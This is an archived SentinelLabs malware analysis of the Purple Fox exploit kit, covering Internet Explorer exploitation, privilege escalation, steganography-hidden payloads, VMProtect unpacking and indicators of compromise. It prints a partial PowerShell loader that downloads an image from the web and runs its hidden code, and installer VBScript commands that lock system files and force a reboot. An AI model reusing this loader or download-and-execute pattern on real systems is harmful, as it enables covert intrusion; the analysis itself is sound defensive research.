{
	"id": "34e380d0-f8e4-436e-b9e7-7e8e06f8c151",
	"created_at": "2026-04-06T01:29:52.917451Z",
	"updated_at": "2026-04-10T03:21:30.820765Z",
	"deleted_at": null,
	"sha1_hash": "c373ef5af06e63a9236cb448bb97040127a79eac",
	"title": "Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3180168,
	"plain_text": "Purple Fox EK | New CVEs, Steganography, and Virtualization\r\nAdded to Attack Flow - SentinelLabs\r\nBy Gal Kristal\r\nPublished: 2020-10-19 · Archived: 2026-04-06 00:56:20 UTC\r\nExecutive Summary\r\nIn recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet\r\nExplorer by actors leveraging the Purple Fox exploit kit.\r\nOur investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054\r\nand CVE-2019-0808 – through publicly-available exploit code.\r\nIn addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall\r\nprotections and some detection tools by adopting steganography and obscuring malicious code with code\r\nvirtualization technologies.\r\nDuring the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in\r\nSeptember 2018, subsequent researchers noted that in 2019 Purple Fox dropped use of NSIS (Nullsoft Scriptable\r\nInstall System) and the Rig exploit kit and instead adopted PowerShell to achieve fileless execution. Earlier this\r\nyear, ProofPoint detailed how Purple Fox added CVE-2020-0674 and CVE-2019-1458 to its arsenal. Our research\r\nreveals that the developers have iterated again, adding more CVEs to achieve privilege escalation, as well as\r\nadopting steganographic and virtualization techniques to avoid detection and hamper analysis.\r\nPayload Delivery Flow\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 1 of 9\n\nIn the attacks we observed, the victim is directed to a malicious site by advertisements or just by clicking the\r\nwrong URL. The attackers are hosting their malware on speedjudgmentacceleration[.]com and targeting Internet\r\nExplorer users.\r\nThe exploit runs mshta.exe with VBScript code as a command line, which then runs PowerShell. 
The PowerShell\r\ncode downloads and executes in memory the next stage of code from\r\nhttp[:]//rawcdn[.]githack[.]cyou/up.php?key=1.\r\nFigure 1: An in-the-wild autonomous detection of the attack by the SentinelOne agent\r\nThe next stage follows a similar pattern to previous versions of Purple Fox. It first checks whether it is running\r\nwith Administrator privileges or not. If so, it installs an MSI package directly from the attacker’s site as key=2.\r\nOtherwise, it tries several different Local Privilege Escalation exploits to elevate itself first.\r\nNew Privilege Escalation Exploits\r\nIn the latest variant of Purple Fox, the attackers have improved two things.\r\nIn the past, Purple Fox would download local privilege escalation (LPE) binaries that used an image file extension\r\n(update.jpg) but which were in fact regular executable files. This technique can easily be detected as malicious\r\nby an appropriate firewall rule or security software.\r\nThe new version of the exploit kit now downloads actual image files (key=3 \u0026 key=4) and uses steganography to\r\nembed each LPE in the image. An example of one of the images used is shown below:\r\nAfter download, the payload is extracted in memory. The following code is used to decode and run it:\r\n$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebC\r\nIEX ($uyxQcl8XomEdJUJd)\r\nFurther, two new exploits are now being utilized to help with local privilege escalation: CVE-2020-1054 and\r\nCVE-2019-0808. Both are kernel exploits in the Win32k component. CVE-2020-1054 was patched as recently as\r\nMay this year. 
The attacker binaries we discovered exploiting these vulnerabilities were compiled on 11 August\r\n2020 and 10 September 2020, respectively.\r\nThe exploits contain debug information and a lot of informative strings. For example, the debug path on CVE-2020-1054 is:\r\nD:\\Personal\\Windows\\Windows10\\Desktop\\CVE-2020-1054-master\\CVE-2020-1054-master\\x64\\Release\\CVE-2020-1054.pdb\r\nAs the folder name where it was compiled suggests, the code was taken from a Git repository. We were able to\r\nquickly trace the exploits to these public repositories: CVE-2020-1054, CVE-2019-0808.\r\nUnfortunately, searching for more binaries in the wild with similar traits has so far yielded no results.\r\nIt is worth noting that all of the scripts check for a specific and consistent registry value named “StayOnTop”\r\nunder HKCU\\Software\\7-Zip. It appears that setting this value enables the malware to determine if the payload ran\r\nsuccessfully. Therefore, finding this value in a computer’s registry indicates compromise by Purple Fox.\r\nRootkit Payload\r\nThe purpose of the PowerShell scripts and privilege escalation exploits is ultimately to install a rootkit on the\r\nmachine. The rootkit’s installation process and capabilities have already been described in detail by other\r\nresearchers; however, in light of the changes we discovered, we wanted to check whether there were any new\r\ndevelopments with regard to the payload, too.\r\nWe found two versions of their malware referenced in the new domain, both of which are MSI installers of the\r\nrootkit. One of these has missing files; however, our analysis of the complete one had some interesting surprises.\r\nThe installation process remains mostly the same. We still see the use of PendingFileRenameOperations for\r\nplacing the files under the system32 directory after a reboot. 
However, the CustomAction table in the MSI\r\npackage has VBScript code that, among other things, runs the following:\r\nvbs.Run \"takeown /f %windir%\\system32\\jscript.dll\",0,True\r\nvbs.Run \"cacls %windir%\\system32\\jscript.dll /E /P everyone:N\",0,True\r\nvbs.Run \"takeown /f %windir%\\syswow64\\jscript.dll\",0,True\r\nvbs.Run \"cacls %windir%\\syswow64\\jscript.dll /E /P everyone:N\",0,True\r\nvbs.Run \"takeown /f %windir%\\system32\\cscript.exe\",0,True\r\nvbs.Run \"cacls %windir%\\system32\\cscript.exe /E /P everyone:N\",0,True\r\nvbs.Run \"takeown /f %windir%\\syswow64\\cscript.exe\",0,True\r\nvbs.Run \"cacls %windir%\\syswow64\\cscript.exe /E /P everyone:N\",0,True\r\nvbs.Run \"powershell Start-Sleep -Seconds 900; Restart-Computer -Force\",0,false\r\nWhat’s interesting here is that these commands are straight from Microsoft’s advisory about how to defend against\r\nthe CVE-2020-0674 vulnerability (Internet Explorer RCE), which is used by Purple Fox to gain initial access. We\r\nsurmise that the purpose of protecting the newly infected machine from that vulnerability may be to keep out rival\r\nattackers.\r\nAfter extracting the malware from the MSI package, we noticed that the payload also has a significant new\r\nfeature: it is now protected by VMProtect.\r\nUse of VMProtect is easy to observe from the PE’s section table:\r\nFigure 2: Entry point in a “.vmp%d” section is a clear indication of VMProtect\r\nThis makes reversing more difficult, as VMProtect employs a number of techniques to hide the original code and obfuscate\r\nit.\r\nUnpacking VMProtect\r\nThere are two primary obstacles to overcome when reversing VMProtected binaries: the packed data and the\r\nvirtualized instructions.\r\nWe first have to unpack the data inside the binary. 
To do that, we used the awesome x64dbg and opened the file.\r\nAfter that, we put a breakpoint on the start of the VirtualProtect function:\r\nWe want to log all the calls to that function, so we enter in the “Log Text” box:\r\nVirtualProtect: lpAddress={a:[esp+4]}, dwSize={d:[esp+8]}, flNewProtect={x:[esp+C]} ;\r\nRunning it until it crashes gives this output:\r\nVirtualProtect: lpAddress=x86_pf.00401000, dwSize=153444, flNewProtect=40 ;\r\nPAGE_EXECUTE_READWRITE\r\nVirtualProtect: lpAddress=x86_pf.00427000, dwSize=1032, flNewProtect=40 ;\r\nPAGE_EXECUTE_READWRITE\r\nVirtualProtect: lpAddress=x86_pf.0047D000, dwSize=76, flNewProtect=4 ;\r\nVirtualProtect: lpAddress=x86_pf.0047E000, dwSize=68, flNewProtect=4 ;\r\nVirtualProtect: lpAddress=x86_pf.00401000, dwSize=153444, flNewProtect=20 ;\r\nPAGE_EXECUTE_READ\r\nVirtualProtect: lpAddress=\"ƒ-\", dwSize=1032, flNewProtect=20 ;\r\nVirtualProtect: lpAddress=x86_pf.0047D000, dwSize=76, flNewProtect=2 ;\r\nWe can see that the data is probably unpacked to virtual address 0x401000, so we’ll want to watch that address\r\nuntil data is written there.\r\nAfter restarting the program, we again put a breakpoint on VirtualProtect, and let the breakpoint hit eight times.\r\nThen, we set the EIP to that address and use x64dbg’s built-in Scylla plugin to dump the binary and fix its imports:\r\nThis gives us a much smaller, debuggable DLL file with plenty of plaintext strings to help us investigate the\r\nmalware.\r\nThe DLL’s code is still obfuscated using virtualized calls, but fortunately for us we found this in the 
strings:\r\nHid_State\r\nHid_StealthMode\r\nHid_HideFsDirs\r\nHid_HideFsFiles\r\nHid_HideRegKeys\r\nHid_HideRegValues\r\nHid_IgnoredImages\r\nHid_ProtectedImages\r\nThis is similar to previously reported versions of their rootkit, which is just a public rootkit that they downloaded\r\nand compiled. From this information, we deduce that they haven’t substantially upgraded their capabilities in the\r\nrootkit.\r\nConclusion\r\nThe Purple Fox exploit kit is under active development. As we’ve seen since September 2018 and again in our\r\nresearch, the malware authors are keeping up with Microsoft patches in order to target those vulnerabilities that\r\norganizations and security teams fail to patch in a timely manner by leveraging publicly-available exploit code.\r\nThis new variant also improves its ability to evade detection by adopting steganography to hide LPE binaries and\r\nmakes use of commercially available software to protect its code from analysis.\r\nIndicators of Compromise\r\nSHA1\r\nc82fe9c9fdd61e1e677fe4c497be2e7908476d64 CVE-2019-1458.exe\r\ne43f98c0698551f997649c75a2bfe988f72060c0 CVE-2020-1054.exe\r\n82af45d8c057ef0cf1a61cc43290d21f37838dd1 cve_2019_0808.exe\r\n6cac8138f1e7e64884494eff2b01c7b1df83aef2 rootkit_from_cve_2019_0808.msi\r\ne65c1a74275e7099347cbec3f9969f783d6f4f7d cve_2019_0808.ps1\r\nbdeed6792463713806f39c3b5abc0d56f176e88f key1.bin\r\n921d1beb3c48b03e20ba1ea07ea1c8f8fc97ec8e key2.bin\r\n2c5c07c969dd715d0e696f8a8e9e6754a9114d4e key3.bin\r\n5a680f659c91870a819ede06746f21282a4929d1 key4.bin\r\n60f2624c39f61ec6c2eff09d463ca57d9a227b9b key5.bin\r\nbd00f0e6e8cbe0b486fe0aad9e6e38ea606f7044 key6.bin\r\n9ba5e84fccf1012343ba72e9584c6af3beb8b361 key7.bin\r\n57b4eac452c2e8c73222d0915a97a63b43d391de key8.bin\r\n57b4eac452c2e8c73222d0915a97a63b43d391de key9.bin\r\nc21b1397d25ece8221e981eb5289c592f71ab4ca 
rootkit_encrypted_payload\r\n0470d80daf464b5ea5ee80e2db18e0582f6dbfaf rootkit_x86\r\nbc9766d405913a6162d3747a5a7d0afe1857ac88 rootkit_x64\r\nSHA256\r\n079c13fbc30a32e4f0386cd53c56d68404961b8f1cd4d4fde1a1e9def42aa557 CVE-2019-1458.exe\r\n7465b738ba31fa2fff7fef1d770ef32e43b01d49a937b3b1c11dc2e4e45fd019 CVE-2020-1054.exe\r\nbabfd8e70102479dea4f239c1ee5de463af07c73a94592b390257c5b3d2878a9 cve_2019_0808.exe\r\n9208e853d6de61f1640822ae723e0d40730e29cef5a660419b95fd32c84c9ade rootkit_from_cve_2019_0808.msi\r\ne30d7375f5f88847b810755f0a2cda82e8eeb084a3b989c85d6f13f6a1c01f38 cve_2019_0808.ps1\r\nb48c61983f2d453d4d6a5ff1f2c9e0e194d7ae892a2649d7bafd267082033748 key1.bin\r\n49d9f5aaeb6fd10d371afbebf33ffed184b22e66350a12a60cbbe34ff1fadf9e key2.bin\r\n8392f7bc7bd93ab035e609619e0915b7e8c91288fc6eb19237c0e2019f8dcaa2 key3.bin\r\n13b0e2769d7a0b3964c4e491f90fc4518f8e5ae4d8c37082ffe764b3a174e9a7 key4.bin\r\n6bee844cdd424c970ff8bba22385ae4c1ae51c2b4e036ba1a217ba37e100530f key5.bin\r\ne49327a62e4500ac23fa0b506c565350fbc9afd497198a8b4b8ae8f537146d53 key6.bin\r\n321eeafe6a9dbd424bf9fdf7ded1ef18c7cab68fadb58cd0da5a1c74479a509f key7.bin\r\n01662ffa9a1c637307e1d148ac2492c69d6035ca87424cbb11e44a178002abc4 key8.bin\r\n01662ffa9a1c637307e1d148ac2492c69d6035ca87424cbb11e44a178002abc4 key9.bin\r\ncfae7a1935f0aaf0f76322f29ad0e0fd1a77d325e55fa324a0bb19e264760800 rootkit_encrypted_payload\r\n181551603ebebbf5924247212c0ed93b6c9c4b088e612bf04f5996c227563318 rootkit_x86\r\n1209aece1f9f54e6422083791eb8a59df878f6959beae9e53736e3056459ab1e rootkit_x64\r\nDomains\r\nspeedjudgmentacceleration[.]com\r\nrawcdn[.]githack[.]cyou\r\ndl[.]gblga[.]workers.dev\r\ndl[.]fmhsi[.]workers.dev\r\nSource: 
https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/"
	],
	"report_names": [
		"purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow"
	],
	"threat_actors": [],
	"ts_created_at": 1775438992,
	"ts_updated_at": 1775791290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c373ef5af06e63a9236cb448bb97040127a79eac.pdf",
		"text": "https://archive.orkl.eu/c373ef5af06e63a9236cb448bb97040127a79eac.txt",
		"img": "https://archive.orkl.eu/c373ef5af06e63a9236cb448bb97040127a79eac.jpg"
	}
}